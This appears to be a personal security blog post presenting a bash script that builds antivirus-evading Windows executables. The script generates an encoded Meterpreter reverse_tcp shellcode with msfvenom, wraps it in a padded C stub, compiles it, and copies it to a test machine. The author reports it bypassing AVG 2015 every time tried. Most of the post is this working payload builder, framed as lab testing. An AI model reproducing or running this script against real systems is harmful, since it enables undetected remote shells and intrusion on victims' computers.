I found the following web page in my research about metasploit encoding and bypassing the AV.
https://www.christophertruncer.com/bypass-antivirus-with-meterpreter-as-the-payload-hyperion-fun/
From the article I created the following bash script to automate the creation of the .exe file that can be copied to the Windows XP SP3 through a file share to test AVG 2015. Fortunately or unfortunately this technique does bypass the AVG 2015 Free, so far 3/3 100% success rate. Virustotal came back with 15 AVs detecting the files as malware.
This script has been improved and is located at this blog post.
#!/bin/bash
#
# Log file where how the payload was created and the filename of the payload
logFile='/root/bypassAV/logFile.txt'
# Bash script to test payloads created with msfvenom and using a c program to hide against AVG 2015
# Platform: Windows XP SP3
# AV Installed: AVG 2015 Free
# Using the following msfvenom options
# Payload: windows/meterpreter/reverse_tcp
# LHOST: 172.24.118.1
# LPORT: 8080
# Bad Characters: \x00 \xff
# Encoder: x86/shikata_ga_nai
# Iterations: 3
# Output format: C
# Check to see if the drive is mounted on the test platform
if [[ ! -f "/mnt/payloadTest/mounted.txt" ]]; then
mount -t cifs //172.24.118.130/share /mnt/payloadTest -o "username=malware,password=malware"
fi
# Until the prog.exe is compiled successfully loop until it is
while [ ! -f /root/bypassAV/outputFiles/prog.exe ]; do
# Generate 2048 characters of random awesomeness for padding
randomPadding=`cat /dev/urandom | tr -dc '_a-zA-Z0-9' | head -c 2048`
echo "unsigned char padding[]=\"$randomPadding\";" > /root/bypassAV/prog.c
echo "" >> /root/bypassAV/prog.c
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.24.118.1 LPORT=8085 -b "\x00\xff" -e x86/shikata_ga_nai -i 3 -f c >> /root/bypassAV/prog.c
echo "" >> /root/bypassAV/prog.c
echo "int main(void) { ((void (*)())buf)();}" >> /root/bypassAV/prog.c
# Using mingw on Kali Linux to compile the executable
i586-mingw32msvc-gcc -o /root/bypassAV/outputFiles/prog.exe /root/bypassAV/prog.c
done
# If the prog.exe fails to be created then skip over the remaining commands
if [[ -f "/root/bypassAV/outputFiles/prog.exe" ]]; then
# Create a random 64 character filename to use as the destination file
randomFileName=`cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 64 | head -n 1`
# Save the information to a log file in the event the file bypasses the AV
echo "${randomFileName}.exe - msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.24.118.1 LPORT=8085 -b \"\x00\xff\" -e x86/shikata_ga_nai -i 3 -f c" >> $logFile
cp -f /root/bypassAV/outputFiles/prog.exe /mnt/payloadTest/${randomFileName}.exe
cp -f /root/bypassAV/outputFiles/prog.exe /root/bypassAV/archiveFiles/${randomFileName}.exe
rm -f /root/bypassAV/outputFiles/prog.exe
fi
# End If for the prog.exe file not being created
Subscribe to:
Post Comments (Atom)
-
Here is a quick walk through of GetBoo. The first item that I found was you can harvest the usernames of the existing users that are regist... -
As I was glancing through the logs of my honeypots I spent some time to look at the following logs. In the past I have just overlooked them... -
I ran a Nikto scan and found the following vulnerability in the report that it produces: "OSVDB-637: Enumeration of users is possible...
-
I thought I would work through a few of these web applications provided by OWASP on their broken web applications VM. The first one I th... -
Today looking at the logs of the honeypots, I became curious based on the whois of the IP Addresses attempting to login to SSH which country...
No comments:
Post a Comment